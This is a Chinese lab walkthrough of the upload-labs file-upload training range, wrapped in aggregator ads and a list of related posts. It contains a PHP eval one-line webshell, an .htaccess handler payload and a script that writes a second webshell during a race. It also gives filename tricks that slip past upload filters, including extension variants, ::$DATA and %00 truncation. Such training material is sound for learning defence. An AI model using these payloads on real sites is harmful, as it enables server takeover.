文件上传&upload-labs-master[小通]

这篇具有很好参考价值的文章主要介绍了文件上传&upload-labs-master[小通]。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

文件上传&upload-labs-master[小通]

蓝易云高性能服务器

文件上传&upload-labs-master[小通]

|

|

|

|

|

🤤🤤🤤🤤🤤🤤点击购买吧-年付送定制U盘

🤤🤤🤤🤤🤤🤤点击购买吧-年付送定制U盘

🤤🤤🤤🤤🤤🤤点击购买吧-年付送定制U盘

🤤🤤🤤🤤🤤🤤点击购买吧-年付送定制U盘

🤤🤤🤤🤤🤤🤤点击购买吧-年付送定制U盘

🤤🤤🤤🤤🤤🤤点击购买吧-年付送定制U盘

|

|

|

|

|

upload-labs-master文件上传靶场

搭建

https://blog.csdn.net/weixin_51075988/article/details/110277974

文件上传&upload-labs-master[小通]

第一关js绕过

那么我们第一关就是js绕过

js绕过理解为前端绕过

首先我们制作一个木马

   <?php @eval($_POST['shell']);?>

前端js绕过非常好绕过

只要我们绕过了浏览器就可以了

我们可以看看他让什么格式后缀的过去

文件上传&upload-labs-master[小通]

我们去上传php后缀的文件是不可以的

他运行jpg格式的和png的

那么我们就将php改成jpg然后我们在通过抓包工具

抓取数据包然后把后缀改为php

文件上传&upload-labs-master[小通]

改成php

文件上传&upload-labs-master[小通]

然后我们点击F12

文件上传&upload-labs-master[小通]

右键这个图片地址

然后去访问这个地址

文件上传&upload-labs-master[小通]

复制然后访问

文件上传&upload-labs-master[小通]

我们发现当访问的时候

他没有继续异常报错什么的

说明成功上传了

那么我们现在就要验证能不能连接上去

用菜刀

文件上传&upload-labs-master[小通]

是php格式的一句话木马

文件上传&upload-labs-master[小通]

连接成功

第二关Conten-Type绕过

这个可以说是类型上的绕过

这个也非常简单

我们写一个php一句话木马

   <?php @eval($_POST['shell']);?>

直接上传然后通过抓包软件抓取数据包

文件上传&upload-labs-master[小通]

那么我们把这个类型改成

一个图片的类型

image/jpeg

文件上传&upload-labs-master[小通]

然后放行

我们会发现这有一条线的东西

那么这个就是我们上传上去的一句话木马

文件上传&upload-labs-master[小通]

我们一样是复制连接然后访问看看有没有报错什么的

文件上传&upload-labs-master[小通]

正常

连接一下

文件上传&upload-labs-master[小通]

连接成功

文件上传&upload-labs-master[小通]

第三关黑名单绕过

在第三关呢有两种绕过的办法

我们看看他的代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

他这个显示不允许后缀为asp和aspx和php和jsp为后缀的文件

那么我们先用第一个方法

就是后缀变异法

我们可以看见他是不允许php文件

但是他没有说不允许php4,php5的后缀文件

所有我们只需要把后缀文件改为php4或者php5就可以了

但是我们要设置一些东西

我们懂这个办法就可以了

第四关htaccess绕过(解析器执行)

我们看看第四关的代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

我们发现他这过滤了非常非常多的东西

那么我们这就用到htaccess解析器绕过

原理是这样的

就是我们上传解析器

这个解析器的任务是把1.jpg的这个照片重命名为1.php

那么我们上传完这个解析器后

我们就把1.php的木马改成1.jpg

那么他这里是可以上传1.jpg的

那么当我们把1.jpg上传后,里面的解析器就会把我们的1.jpg再改回1.php这样就可以了

解析器代码

<FilesMatch "1.jpg">
SetHandler application/x-http-php
</FilesMatch>

后缀要是htaccess

我们再制作木马文件

   <?php @eval($_POST['shell']);?>

我们先上传解析器

文件上传&upload-labs-master[小通]

然后再上传1.jpg

就欧克了

我就就不改配置了你要知道有这个办法就可以了

第五关(点空格点)绕过

第五关

我们通过抓包工具在php后面加上点空格点

就可以绕过了

文件上传&upload-labs-master[小通]

放行

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

正确情况下后面这是有一个点的

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

第六关大小写绕过

这关只需要把后缀为php改成PhP就可以了

文件上传&upload-labs-master[小通]

第七关空格绕过

这个也非常简单

我们制作一个木马

<?php
    @eval($_POST['shell']);
    ?>

正常抓包

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

正常回显

文件上传&upload-labs-master[小通]

第八关|点空格点|点空格|点|三种绕过

第一种点空格点

文件上传&upload-labs-master[小通]

第二种点空格

文件上传&upload-labs-master[小通]

第三种点

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

第九关::$DATA绕过

::$DATA

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

我们访问的时候是这样的

文件上传&upload-labs-master[小通]

这样是不行的

我们必须把把后面的::$DATA去掉

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

第十关点空格点绕过

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

第十一关双写绕过

双写绕过非常简单

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

第十二关%00[百分之零零]绕过

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

我们访问验证一下

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

第十三关%00再继续url编码绕过

一开始我们抓取的数据包是这样的

文件上传&upload-labs-master[小通]

那么我们进行改一下

文件上传&upload-labs-master[小通]

添加一个1.php%00

那么我们这个%00要进行url编码

选中%00右键

文件上传&upload-labs-master[小通]

编码完后%00他会消失掉

文件上传&upload-labs-master[小通]

那么我们还需要把下面的1.php改成1.jpg

文件上传&upload-labs-master[小通]

然后放行

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

去掉这部分

文件上传&upload-labs-master[小通]

用菜刀连接一下

文件上传&upload-labs-master[小通]

第十四关文件包含绕过【跳过】

首先准备一张图片和一个一句话木马

然后在外面当前目录下打开cmd

文件上传&upload-labs-master[小通]

copy n.jpg/b + 1.php/a 1.jpg

那么这是什么意思呢

copy 你准备的图片名称/b + 你的一句话木马/a 你要生成的图片名称

文件上传&upload-labs-master[小通]

这个就是我们生成的一句话木马图片

我们现在把一句话木马图片上传上去

https://blog.csdn.net/weixin_43571641/article/details/83868668

第十五关文件包含漏洞【跳过】

第十六关需要改一下东西【跳过】

https://blog.csdn.net/qq_44133136/article/details/109208174

第十七关二次宣染传【跳过】

二次渲染的话

就是你一开始上传了一下图片上去

这张图片是没有木马的

上传上去后再下载下来

下载下来后呢

用进制工具打开这张图片

将下载的那种和原来的那种进行对比看看哪些没有改变的

因为用到网站他是会重新去构造你的图片

就是你看起来图片一样的但是他里面的构造发现了变化

文件上传&upload-labs-master[小通]

将两个图片进行对比找到一个没有改变的地方然后插入一句话木马

然后再将改完的上传上去就可以了

就可以了

那么我们要选择gif后缀的图片来做这个实验

第十八关条件竞争

这关是条件竞争

我先说一下原理

首先我们当我们上传一个一句话php

有会在服务器停留一段时间然后才会被识别删除的

这时间大概就1秒左右

那么他能够停留1秒左右那么我们就可以利用这一个条件来生成一个木马文件

<?php $file=fopen('2.php','w+');fwrite($file,'<?php @eval($_POST[shell]);?>');fclose($file);?>

这个代码是这样的

这个代码写在1.php文件中

那么当我们上传后这个1.php就会停留一秒左右

那么我们就可以在他删除之前访问这个1.php

当我们访问的时候

就会激发里面的源代码

源代码的功能就是生成一个2.php

然后2.php里面写入一个一句话木马

文件上传&upload-labs-master[小通]

抓包发生的int中

添加一个循环变量

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

那么我们回到proxy

文件上传&upload-labs-master[小通]

点击这个int

然后我们访问1.php的链接

文件上传&upload-labs-master[小通]

把数据包发送到int

设置一个循环访问变量

文件上传&upload-labs-master[小通]

然后就开始跑

两个一起跑

先跑上传数据包的

然后跑访问1.php的

文件上传&upload-labs-master[小通]

那么方法就是这个

但是我们实验没有成功

如果实验成功会生成一个2.php的一句话木马

第十九关这关也是条件竞争

这个和上面是一样的

https://blog.csdn.net/Thunderclap_/article/details/108948611

第二十关点绕过

文件上传&upload-labs-master[小通]

后面加多一个点可以了

第二十一关斜杠绕过

文件上传&upload-labs-master[小通]

改包

复制一份

粘贴

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]

文件上传&upload-labs-master[小通]
文件上传&upload-labs-master[小通]文章来源地址https://www.toymoban.com/news/detail-439373.html

到了这里,关于文件上传&upload-labs-master[小通]的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • upload-labs1-21关文件上传通关手册

    看源码可知道 仅让上传此三类的文件类型,其他都不可以上传。 上传会有js弹窗,前端检查(前端校验): 我们可以有三种绕过方法: 第一种:关闭网页的js提示弹窗 第二种:检查源代码,进行修改 第三种:利用burp进行抓包,修改上传的文件后缀.php 第一种: 在火狐浏览

    2024年02月09日
    浏览(48)
  • 全面了解文件上传漏洞, 通关upload-labs靶场

    upload-labs是一个专门用于学习文件上传漏洞攻击和防御的靶场。它提供了一系列模拟文件上传漏洞的实验环境,用于帮助用户了解文件上传漏洞的原理和防御技术。 这个靶场包括了常见的文件上传漏洞类型,如文件名欺骗、文件类型欺骗、文件上传功能绕过等。通过练习不同

    2024年02月04日
    浏览(48)
  • 文件上传漏洞--Upload-labs--Pass07--点绕过

    在Windows系统中,Windows特性会将文件后缀名后多余的点自动删除,在网页源码中,通常使用 deldot()函数 对点进行去除,若发现网页源代码中没有 deldot() 函数,则可能存在 点绕过漏洞。通过点绕过漏洞,可以达到上传含有恶意代码的文件的目的。 1、首先进行代码审计,发现网

    2024年02月21日
    浏览(43)
  • 文件上传漏洞--Upload-labs--Pass05--大小写绕过

    我们想要上传含有恶意代码的 .php 文件,但 .php 后缀名的文件可能会被 白名单 或 黑名单拦截,从而上传失败,在某些源代码中,没有对文件的后缀用 strtolower()函数 统一进行小写化,这就会存在大小写漏洞,我们可以将 test.php 写作 test.Php,这样就可以绕过源码中的黑名单,

    2024年02月20日
    浏览(55)
  • 文件上传漏洞--Upload-labs--Pass13&&14&&15--图片马

    顾名思义,图片马即 图片 + 木马。将恶意代码插入图片中进行上传,绕过白名单。 图片马制作流程: 1、在文件夹中打开 cmd,输入指令。 /b:二进制、 /a:追加。即将 test.php 追加到 test.jpg 中生成新图片 new.jpg。 1、首先进行代码审计,源代码中使用白名单,判断文件类型,

    2024年02月22日
    浏览(50)
  • 文件上传upload-labs第三关,Apache无法解析php3、php5等问题

    修改文件后缀名为php5,上传后。无法解析php5 参考网上众多教程,修改httpd.conf配置文件: 添加.php3 .php5 phtml,大部分都可以解决 PHPStudy中AddType application/x-httpd-php等Apache命令之所以在Apache的设置文件中设置后未实现目标效果是由于PHP的版本不符导致的 修改版本,切换到如图所

    2024年02月12日
    浏览(54)
  • Ant Design upload 文件上传 限制文件只能上传一个

    上传前:                 回显:可以删除   最近做了一个后台管理系统使用的是 Ant Design和vue框架搭建的 文件上传 :组件:  Ant Design   https://1x.antdv.com/components/upload-cn/  (upload 官方文档) 功能需求 : 1.可以拖拽,或者点击上传文件  2.只能上传单个文件,不能上传多个文

    2024年02月14日
    浏览(45)
  • ElementUI —— Upload 文件上传

    前言 :            实现单文件上传!此文章仅记录代码如何实现,便于后期项目学习使用!! 代码实现 :

    2024年02月16日
    浏览(53)
  • 文件上传漏洞 (upload部分通关教程)

    只适合只有前端验证的网站 一句话木马: 保存到文件中: 使用第一关直接上传,报错: 按照网站要求,修改文件后缀名为jpg: 重新上传111.jpg文件,打开burp抓包,修改包中的后缀名 点击Forword上传,上传成功: 使用蚁剑连接后台步骤: 复制url: 连接成功: 原理就是验证后

    2024年02月22日
    浏览(40)
  • Vue Element upload组件和Iview upload 组件上传文件

    今天要分享的是使用这俩个UI组件库的upload组件分别实现调用组件本身的上传方法实现和后台交互。接下来就是开车的时间,请坐稳扶好~ 一、element upload组件传送门  1、html文件 注意事项: 使用组件本身的上传事件,必须加auto-upload属性设置为false;                 

    2024年02月11日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包